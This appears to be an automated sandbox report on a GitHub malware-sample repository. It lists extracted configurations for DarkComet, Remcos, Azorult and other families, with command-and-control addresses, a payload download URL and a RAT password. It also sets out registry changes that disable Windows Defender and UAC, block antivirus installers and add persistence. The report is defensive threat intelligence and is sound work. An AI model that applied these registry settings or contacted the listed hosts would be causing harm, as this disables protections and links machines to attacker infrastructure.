azorult | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
371s
max time network
372s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
18/02/2025, 15:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Malware Config

Extracted

Family

darkcomet

Botnet

Guest1111

193.242.166.48:1605

Mutex

DC_MUTEX-2QRLPN3

Attributes

InstallPath
Windupdt\winupdate.exe
gencode
Rb5l52XcV9no
install
true
offline_keylogger
false
password
313131
persistence
true
reg_key
winupdater

rc4.plain

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Host

nickman12-46565.portmap.io:46565

nickman12-46565.portmap.io:1735

Attributes

audio_folder
audio
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
5
copy_file
Userdata.exe
copy_folder
Userdata
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%WinDir%\System32
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%WinDir%\System32
mouse_option
false
mutex
remcos_vcexssuhap
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screens
screenshot_path
%AppData%
screenshot_time
1
startup_value
remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002afc2-679.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
trojan rat darkcomet
Darkcomet family
darkcomet
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

Modiloader family
modiloader
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Rms family
rms

UAC bypass 3 TTPs 8 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Warzonerat family
warzonerat

Windows security bypass 2 TTPs 1 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

resource	yara_rule
behavioral1/memory/6396-1924-0x0000000005B50000-0x0000000005B78000-memory.dmp	rezer0

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
776	net.exe
5300	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe

Contacts a large (1787) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5984	netsh.exe
7064	netsh.exe
2364	netsh.exe
6780	netsh.exe
5068	netsh.exe
5532	netsh.exe
1204	netsh.exe
5272	netsh.exe
6208	netsh.exe
6596	netsh.exe
6212	netsh.exe
6080	netsh.exe
7156	netsh.exe
6768	netsh.exe
6112	netsh.exe
2632	netsh.exe
6912	netsh.exe
5388	netsh.exe
4952	netsh.exe
6564	netsh.exe
4176	netsh.exe
5600	netsh.exe
5432	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
644	attrib.exe
544	attrib.exe
5168	attrib.exe
1860	attrib.exe
644	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x001900000002b060-2092.dat	acprotect
behavioral1/files/0x001900000002b061-2093.dat	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x001900000002b05e-2054.dat	aspack_v212_v242
behavioral1/files/0x001900000002b05d-2094.dat	aspack_v212_v242

Executes dropped EXE 25 IoCs

pid	Process
1188	msload.exe
3896	dlrarhsiva.exe
6008	Userdata.exe
6504	wini.exe
6600	winit.exe
1460	rutserv.exe
1556	rutserv.exe
5844	rutserv.exe
5592	rutserv.exe
6004	rfusclient.exe
6104	rfusclient.exe
684	cheat.exe
2364	ink.exe
5164	taskhost.exe
6516	P.exe
852	rfusclient.exe
2932	R8.exe
7100	winlog.exe
6092	winlogon.exe
6176	Rar.exe
6876	taskhostw.exe
2200	RDPWInst.exe
6648	winlogon.exe
3320	RDPWInst.exe
3012	taskhostw.exe

Loads dropped DLL 1 IoCs

pid	Process
5660	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6800	icacls.exe
5392	icacls.exe
5544	icacls.exe
6088	icacls.exe
6892	icacls.exe
4932	icacls.exe
5684	icacls.exe
2900	icacls.exe
1368	icacls.exe
5968	icacls.exe
3952	icacls.exe
644	icacls.exe
5884	icacls.exe
6828	icacls.exe
5480	icacls.exe
5176	icacls.exe
3164	icacls.exe
4292	icacls.exe
2032	icacls.exe
6108	icacls.exe
468	icacls.exe
6876	icacls.exe
2112	icacls.exe
6060	icacls.exe
6884	icacls.exe
6872	icacls.exe
6716	icacls.exe
5240	icacls.exe
6996	icacls.exe
3544	icacls.exe
6832	icacls.exe
2700	icacls.exe
6844	icacls.exe
2036	icacls.exe
6608	icacls.exe
5784	icacls.exe
3416	icacls.exe
404	icacls.exe
6872	icacls.exe
6564	icacls.exe
2672	icacls.exe
6816	icacls.exe
6596	icacls.exe
2456	icacls.exe
6944	icacls.exe
1340	icacls.exe
4632	icacls.exe
6160	icacls.exe
3616	icacls.exe
6100	icacls.exe
6848	icacls.exe
5480	icacls.exe
5844	icacls.exe
2452	icacls.exe
3496	icacls.exe
492	icacls.exe
7032	icacls.exe
5552	icacls.exe
6344	icacls.exe
4572	icacls.exe
2616	icacls.exe
5432	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/7124-2014-0x0000000002490000-0x00000000024A4000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 18 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Q4 = "c:\\eiram\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\quake = "f:\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\winsrv = "c:\\windows\\system\\winsrv.exe"	Opaserv.l.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Userdata.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\scr = "c:\\windows\\system\\scr.scr"	Opaserv.l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\DEVICECREDENTIAL = "C:\\WINDOWS\\DEVICECREDENTIAL.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe"	Blaster.A.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\Q4 = "f:\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\D3D10_1 = "C:\\WINDOWS\\D3D10_1.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MPREXE = "C:\\WINDOWS\\MPREXE.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DLLHST3G = "C:\\WINDOWS\\DLLHST3G.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\ACTIVATIONCLIENT = "C:\\WINDOWS\\ACTIVATIONCLIENT.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\quake = "c:\\eiram\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CONSOLELOGON = "C:\\WINDOWS\\CONSOLELOGON.EXE"	Opaserv.l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\LoadManager = "c:\\windows\\system\\msload.exe"	Opaserv.l.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5232	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
5540	cmd.exe
5348	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
1282	drive.google.com
2176	raw.githubusercontent.com
2177	iplogger.org
2186	raw.githubusercontent.com
2245	iplogger.org
2602	raw.githubusercontent.com
2608	raw.githubusercontent.com
1188	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1848	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	ClassicShell.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001900000002b05f-2040.dat	autoit_exe
behavioral1/files/0x001900000002b06a-2148.dat	autoit_exe
behavioral1/memory/6648-2317-0x00000000007F0000-0x00000000008DC000-memory.dmp	autoit_exe

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Windupdt\	Blackkomet.exe
File created	C:\Windows\SysWOW64\remcos\logs.dat	iexplore.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier:$DATA	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\remcos\logs.dat	iexplore.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:Zone.Identifier:$DATA	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 6008 set thread context of 5560	6008	Userdata.exe	283
PID 6396 set thread context of 4540	6396	WarzoneRAT.exe	292
PID 7124 set thread context of 6880	7124	Lokibot.exe	655

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3412-451-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/3412-462-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/3412-465-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/3412-587-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/3412-654-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/files/0x001900000002b060-2092.dat	upx
behavioral1/files/0x001900000002b061-2093.dat	upx
behavioral1/files/0x001a00000002b0c2-2247.dat	upx
behavioral1/memory/6092-2251-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/6092-2272-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x001900000002b0dc-2307.dat	upx
behavioral1/memory/6648-2313-0x00000000007F0000-0x00000000008DC000-memory.dmp	upx
behavioral1/memory/6648-2317-0x00000000007F0000-0x00000000008DC000-memory.dmp	upx

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe

Drops file in Windows directory 25 IoCs

description	ioc	Process
File created	C:\WINDOWS\MPREXE.EXE	Opaserv.l.exe
File created	C:\WINDOWS\CONSOLELOGON.EXE	Opaserv.l.exe
File opened for modification	C:\WINDOWS\DLLHST3G.EXE	Opaserv.l.exe
File opened for modification	C:\Windows\MSBIND.DLL	Opaserv.l.exe
File opened for modification	\??\c:\windows\system\winsrv.exe	msload.exe
File opened for modification	\??\c:\windows\system\msload.exe	Opaserv.l.exe
File created	\??\c:\windows\system\msload.exe	Opaserv.l.exe
File created	C:\WINDOWS\DEVICECREDENTIAL.EXE	Opaserv.l.exe
File opened for modification	\??\c:\windows\MPREXE.EXE	msload.exe
File opened for modification	\??\c:\windows\system\msload.exe	msload.exe
File opened for modification	\??\c:\windows\MPREXE.EXE	Opaserv.l.exe
File created	C:\WINDOWS\D3D10_1.EXE	Opaserv.l.exe
File opened for modification	C:\WINDOWS\DEVICECREDENTIAL.EXE	Opaserv.l.exe
File created	C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe	Prolin.exe
File opened for modification	C:\WINDOWS\MPREXE.EXE	Opaserv.l.exe
File opened for modification	\??\c:\windows\system\scr.scr	Opaserv.l.exe
File created	\??\c:\windows\system\scr.scr	Opaserv.l.exe
File opened for modification	\??\c:\windows\system\winsrv.exe	Opaserv.l.exe
File created	C:\WINDOWS\ACTIVATIONCLIENT.EXE	Opaserv.l.exe
File opened for modification	\??\c:\windows\system\scr.scr	msload.exe
File created	\??\c:\windows\system\winsrv.exe	Opaserv.l.exe
File opened for modification	C:\WINDOWS\CONSOLELOGON.EXE	Opaserv.l.exe
File opened for modification	C:\WINDOWS\D3D10_1.EXE	Opaserv.l.exe
File created	C:\WINDOWS\DLLHST3G.EXE	Opaserv.l.exe
File opened for modification	C:\WINDOWS\ACTIVATIONCLIENT.EXE	Opaserv.l.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6036	sc.exe
4700	sc.exe
232	sc.exe
5372	sc.exe
492	sc.exe
5884	sc.exe
5404	sc.exe
2632	sc.exe
6660	sc.exe
5984	sc.exe
5448	sc.exe
4660	sc.exe
7040	sc.exe
5236	sc.exe
3080	sc.exe
6204	sc.exe
6564	sc.exe
2112	sc.exe
5068	sc.exe
7004	sc.exe
4528	sc.exe
1340	sc.exe
6924	sc.exe
8	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{11562E80-F349-4775-A7C3-94C766D00AD2}\8tr.exe:Zone.Identifier	WINWORD.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
